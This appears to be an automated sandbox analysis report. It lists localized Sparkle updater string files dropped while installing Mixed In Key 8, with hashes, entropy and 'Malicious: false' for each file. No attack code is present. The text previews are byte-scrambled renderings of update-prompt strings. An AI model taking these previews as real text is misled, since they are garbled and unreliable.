Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @yb lnitslavo.. n.aj. e.pi.rpvanek ..op.ui..t .opp .....tm.s up...tn... ..Pe.ejets ipailakic% $1 @yn.n .annitslavotaa ..nzvo upssuit?t;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " pAilakec% $1 @en.m.e.b .. tkautlazivo..an ,rpto.oe.j eps.ut...anz n zepasivotale.nh. o.md.ai ..M.e.t o.bt.C /DVD-DOR,Mo rbzad siukn be oej nen.mt. erp..ovz ..ipusn aidks ..Pe.us..eta lpkica i1%@$d oav...s ol..ykA lpkica,es up.st. eijz t hoto omu..ts..inz onuv"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$j eennjvo...j. .odtspu.n .evzr"e.;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " eJk d siopizic% $1 @2%@$- m ..et% $3.@P ..jete eisn ny..z ok.pr.votaa tkauilazic"?.;".@%d wolnaoed"d= " kz

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cy.lproj/.BC.T_hk06xj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2424
Entropy (8bit):	4.717127628221706
Encrypted:	false
SSDEEP:	48:LwIFT9+2I6xBb3CQcLgeUiYRIRALkHLk3LtRySGRJX+kK0:LLK2ImHjlRIRALiLuLtkSGjX+i
MD5:	FC3EA6E0077DA6182BBE7CC2FFCA1236
SHA1:	28DF08B4E8E111F7F02CA03F3157E2372A80C720
SHA-256:	2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
SHA-512:	5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/da.lproj/.BC.T_39XHnc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3656
Entropy (8bit):	4.828274685627281
Encrypted:	false
SSDEEP:	96:PDhNOYwRFzTLhuras8n+LvLPqr6Nw+hfFIo4lp1Ruqf57y:bhNPwRFzTLh9+LvLSG4lvIQy
MD5:	69B7C9EBCFB043EE4647310C2DF9F853
SHA1:	5B21F99F4F0492303EBEDFDF725F4FBA74A95E6C
SHA-256:	9A630D799DE61271D8E903D22A97265DA9F61B43D41D749CF03080A9A4CD0227
SHA-512:	0420A45902C10E12DF013C0A0EB0C2E059E9710B47A82F82013A578D7968DCCDA8727BFA6878778A94D5A6070BBFF96D0F4B1B7791B7BE91FE029738A882739A
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @reh neet tgok al rit lrbgu !iV ludi snatllre egog netsraet% $1 @un"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nkieko dptaresen .. red t.kr.sef are nuk n.ls.ab rneeh.dF yl t1%@$t lim paep nrPgoarmmre ,egsnattrd rerf agop .rv.i eg.n;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @red nea tkeull eevsroi.n;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e ritgl..gnlegi !uDh ra% $3.@S ak led nehtnsen ?u;"..%" @odnwoldade " =%" @ehtnte;"..%" @fo% "@= " 1%@$a f2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv reisnoa f@%e ritgl..gnlegi"!.;". Aen wevsroi nfo% @sir aeydt onitsla!l " =E" nynv reisnoa f@%e rlkrat lii snatllreni!g;"..A" nreor rcoucrrdei n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/de.lproj/.BC.T_NJzGou Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3674
Entropy (8bit):	4.847547878248266
Encrypted:	false
SSDEEP:	96:PoLx3vhmNmVOAoqLhuxqLuRQqLJOb0qLhmL2zE6qL9o7Vy21J5R:w13vhmNxqLheqLLqLcb0qLhmabF7oS
MD5:	A1EB1385AD11092F71BA5FF256F0CEDC
SHA1:	A8DECBC94F5C531A7A37C54875961CDF7DF93F9B
SHA-256:	1F4B5B48B961337D1604691A88FDBF1B149F60E0E33E0A54A8E1D6E27938526C
SHA-512:	093237B75CAD280097AC304C28384F6D7CAC792800CE80D6C562235F69D84889072C5D1D37DCBC2058C7C858315EE0D5DC0B480A4267598D9B1BDA06B2B3CCC0
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @uwdr eehurtnreegaled nnu dtshe tuz reVwrneudgnb reie!tM ..hcet niS e1%@$j tetzd ruhcd ein ue eeVsroi nreesztneu dnn ues attrne"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @aknnn citha tkauilisre tewdrne ,ewnne sov nieen moVulem nhoenS hcerbiuzrgfi fz(B. .iDksI amego ed rDCD/DV )egtsraet tuwdr.eK poeier niS e1%@$i ned nrPgoarmm erOndre ,kautlasieier niS esev nod ro.t;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @si tuz reZtid ein ueseetv re.fg.aberV reisno"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @si tevfr..bgra( iS eevwrneed neVsroi n3%@$.)M ..hcet niS eid eeneuV reisnoj tetzh renuetlrdane"?.;".@%d wolnaoed"d= " @%h renuetgrledane;"..%" @fo% "@= " 1%

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/el.lproj/.BC.T_0uLYRr Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4422
Entropy (8bit):	5.1911339140660395
Encrypted:	false
SSDEEP:	96:Pgl6kv4oUlrZqZSkCUAEIigLADssnDT6uDSpMLPXD+BM/E6NYPZNMqFgkrXYi4:mFiNgjgL4yMLd/mZyCgkr34
MD5:	DA4EBB595EB2C4CF1BD8199EC95141AE
SHA1:	DFEF8A3FC52B07BEB322A49AEB90AC2550880193
SHA-256:	5E22748AC7C634DE19F1A0F0D32BECB495F646DF879F88FBA0F56F57372D4440
SHA-512:	BFB8435F916678EF4A291B3B4AF4B5FF26B58F91508D940F57642410F7B0483B8425C49C171E2B1F2779E171742F4C1B19F934D4249C075E002148A6919284E1
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " ...% $1 @2%@$. ... ......... .. ........ ..... ....... ....!.. . ......... . ..... ............ ...... . ................. . .1%@$. ...;.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " ...% $1 @..... ..... ..... ......... ...... ..... ...... ... ........ ........-....... ....... ..... ....... ............. . .1%@$. ... ......... ........ ..... ,............... . ...... ...,.. .. ..............."..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =.". .1%@$% $2 @....... ............ ........ ........"..;".@%% @sin woa avlibael

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/en.lproj/.BC.T_ASNNXY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4132
Entropy (8bit):	4.792047857345539
Encrypted:	false
SSDEEP:	96:HJj6Q21ra2AOpiaT7sjLJOTQL22fRgEC+NNGCWFIo4l/XV75K:pjf+raRagLccLfgf34l/VE
MD5:	2CC426B92381ABE3E2E44E43FB6D2655
SHA1:	EDA564CFCE0C270EAB65ABA0E23A6CEF28A33789
SHA-256:	11443A9A18E0DA638B61A4EDA53A87BEF3B4900662432B4663406CF7932DB207
SHA-512:	AF170445DEDA1EC65DAD7F37AC35789E1F236E8C520DF72422CE56F84687D09A82DAEC5C222ADF58503362B2075B7DA7E1314FFBB9BCFE92C6CCF22B9707450F
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !hTsii snai pmroattnu dpta;ew uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !hTsii snai pmroattnu dpta;ew uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w;"..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$c na..t.b epuadet dhwnei .t.. surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb-ey-uo

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/es.lproj/.BC.T_80ck1C Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3568
Entropy (8bit):	4.881888869875779
Encrypted:	false
SSDEEP:	96:PqU6/jLmn1gALMeiVMB6LusLJOVMvCi2KM6KE9VxMYcVS4k/sZS:xsLmn2lOB6LusLcOat6Kf5k0S
MD5:	904BBB71B712CEDEF3897E39A6E2BE8E
SHA1:	8E5118B8BAE7CF21F81BBE34581C4BBA7587EFF3
SHA-256:	F89FCD9201741E9BC02500BD4D61116EE20D94004A240EFB8A346370825F14E0
SHA-512:	AC861D30DFF280025A9B4DC8D07A6CBDC8977D22EE44F61591504A291F12C15B230C1827C3CFE6B20CB07699904A27193C4242EFF5A9B80958CB82A212C35DA7
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @esh nad seacgrda o yse.tn.l siot saparu itilaz.r. L. eugtsra.. anitslarae i inicra% $1 @haro?a;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$n oesp eueda tcauilaz rucnaods ejecetu aedds enuv lomuned e.sl. oeltcru aocomi ameg nedd sioco m deoi. p.itoc .uMve a1%@$a s uacprte aedA lpcicaoien s yrtta eedi inicraold seeda ll.."..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e sal. l.itamv reis.. nidpsnobiel"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @se.t .idpsnobiel( suet ditne eal% $3)@ ...eDes aedcsraaglr aharo?a;"..%" @odnwoldade " =%" @edcsraagod;"..%" @fo% "@= " 1%@$d e2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =."H.yau ann euavv reis.. ned% .@!.;"..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fi.lproj/.BC.T_dZxiw8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2500
Entropy (8bit):	4.8752165718531755
Encrypted:	false
SSDEEP:	48:LJMFuI4uWIZ3wGnjEZiqeUik5NAioR18MkgLtReZR1nAEj88DFzKE:LKwOWIOKIZBjFNALR15Lt0R1AEjRoE
MD5:	8A8DB0FF1F7E062F789594FC566C8000
SHA1:	19921C6F3E817D4C31A5C23E9C3D3D39D7E82CEF
SHA-256:	1DD3B764E2F93C0238541D0C748359CBB5E88B3CAB708CBE6269FA5D5073697E
SHA-512:	0DFC6DE43FA9B23BB34F710E9B0ADA5613F2C306D0863A2B9F249AEA9E8170BC88C11578C7B713D481767F46B24FB29175A0B458E18BD731675A28138DBE596B
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$/ % $2"@.;".@%% @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e@%s attr!sW uodly uol ki eotr leuacn hon?w " =%"$1 @2%@$o nsaneentt uajo navmliiank ..ty.t.n.s uearvanak rear nuk n3%@$k ..nyintste...!nH laaukt o.ky.nnsi.t. .hoejmlnau duleelne"?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$o nuuis nastavalialo elavv reis.o;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @non tys aaativll as(nilualo n3%@$.)H laaukt oaladats nen ty"?.;".@%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p " =K"..ty.tj...ll..% @ieo elo kiueskaio jhleam naksnoino !jAtaoko jhleam aelyvitdesootts?aJ soe ,tk sy ypaauj ..jrseetml.. nly.lp.ti...jl..t..;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =U"su ievsroio jhleamts a@%o nsaneentt!u;"..A"n wev reisnoo f@%i svaiaallb!e " =U"su ievsroio jhleamts a% @nos aaativll!a

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fr.lproj/.BC.T_heT8Ht Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3714
Entropy (8bit):	4.888751024111058
Encrypted:	false
SSDEEP:	96:PVXhc6SDI7Ah4sLhu1wp+LJO8LwgLPAwDFf8/cNSoLp5J8Zf:J6j74sLhyLcgLYwD5pUf
MD5:	225C9BA3FFB0766A5AC5D371BB6B15FF
SHA1:	AD66D63630381BAC884BD90361B0DA0C37E4E073
SHA-256:	78FDC8F099DB63A427C3143BC2E5967C054BE0A460596CB265DB9010E9F0CC65
SHA-512:	39F98DA8AB95F8B605DF0945A2A276D66F74F8F11920DB71A37C8587B5BC7CD53EC90A15FA573FF34F9347D3B9AB9BF008D29BCEA9A07CBBF0F72BFCBAE710C9
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ a...t ..tl...hcra.g..V uoel-zovsul ..i.snatllree teralcnre% $1 @amnietantn.."?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @enp ue tap s..rt eim s..j uo ruqna dlif notcoinn e..p rait r.d..nuv lomu enel ceuters ueel ,ocmm enu emiga eidqseuo unul ceetruo tpqieu ..Dp.alec z1%@$d na sovrt eodssei rpAlpcitaoisn ,eralcnzel- e..p rait redl ..e t.re.ssyaze"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e tsl aevsroi nalp ul s.rc.neetd siopinlb.e;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e tsd siopinlb.e;.v uo stulisizel aevsroi n3%@$ .oVluzev-uo selt ...lc.ahgrrem iatnnena.t?.;"..%" @odnwoldade " =%" @.tl...hcra.g"..;".@%o f@% " =%"$1 @us r2%@$;"..A"n wev re

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/he.lproj/.BC.T_MC2ntM Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2604
Entropy (8bit):	5.008724955056715
Encrypted:	false
SSDEEP:	48:LwnU1ujilOkOhDBK6X8CGeUi2AiR1LkTS1LtR3meR8whiQYt1Hs:L+UgPhdK6Xcj9Au1LyS1LtdzR8wwQY7s
MD5:	3270BA6D293CD90010791C5FF09BFD8F
SHA1:	678084F1C133B194FF3F2C23F05D9B84D1B31E95
SHA-256:	47E5E47BCDB90558D6CE23284BC7E9F7950ADBA18F0C465190BC62047F36A14B
SHA-512:	BE9F91D4CA8FCCE76805C074FF94BB5C143866B7B2DADEFA309235A64B1579AC688E5D02CC5E5854AF3F9EE6B9E0468B4A154EE453E636390DD3A82080884CFB
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @........ .... ........ ..... ....... ... ........ . .3%@$! . ..... ......."?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. .. ........ ..... ........"..;".@%% @sin woa avlibael( oy uahev% )@ .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. ... .....( .... . .3%@$.). ..... ......... ..?.;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " ..% @..... .... ........ ..... .......... !..... .. ....... -.d si cmiga?e. . .... ,..... ... ........ .....;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =."... ....... . .@%. .....!.;"..A"n wev reisnoo f@%i svaiaallb!e " =."... ....... . .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/hu.lproj/.BC.T_AMnkNI Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2424
Entropy (8bit):	4.717127628221706
Encrypted:	false
SSDEEP:	48:LwIFT9+2I6xBb3CQcLgeUiYRIRALkHLk3LtRySGRJX+kK0:LLK2ImHjlRIRALiLuLtkSGjX+i
MD5:	FC3EA6E0077DA6182BBE7CC2FFCA1236
SHA1:	28DF08B4E8E111F7F02CA03F3157E2372A80C720
SHA-256:	2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
SHA-512:	5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/id.lproj/.BC.T_mutGJN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2424
Entropy (8bit):	4.717127628221706
Encrypted:	false
SSDEEP:	48:LwIFT9+2I6xBb3CQcLgeUiYRIRALkHLk3LtRySGRJX+kK0:LLK2ImHjlRIRALiLuLtkSGjX+i
MD5:	FC3EA6E0077DA6182BBE7CC2FFCA1236
SHA1:	28DF08B4E8E111F7F02CA03F3157E2372A80C720
SHA-256:	2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
SHA-512:	5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/is.lproj/.BC.T_FrnMQZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2486
Entropy (8bit):	4.941691582568595
Encrypted:	false
SSDEEP:	48:LcMFADdR9c27BVIRJoBLohZ05MkTWCRHFLkkjSH+A9FmA8HutyNPvAAiN2:LbAZU27BVInceZ05FTpRHFLnjSH+AHMr
MD5:	658C922C387DE9085433993836674519
SHA1:	CD1BD898E900C35295BA365441EAE812987A92D1
SHA-256:	7BA6A77B194445F35D135E3C361BED3BA394D8AEBC9950F3E9FB32700177E141
SHA-512:	C6989CAEBFC7EBEF557126A1CFAD44B4CBFFD87A32186AA0DE2A33214F3D20034716E3FFCE4AA2104B32E50D5D9C739CF0521CF5D66D1651E54C8B383A17D29E
Malicious:	false
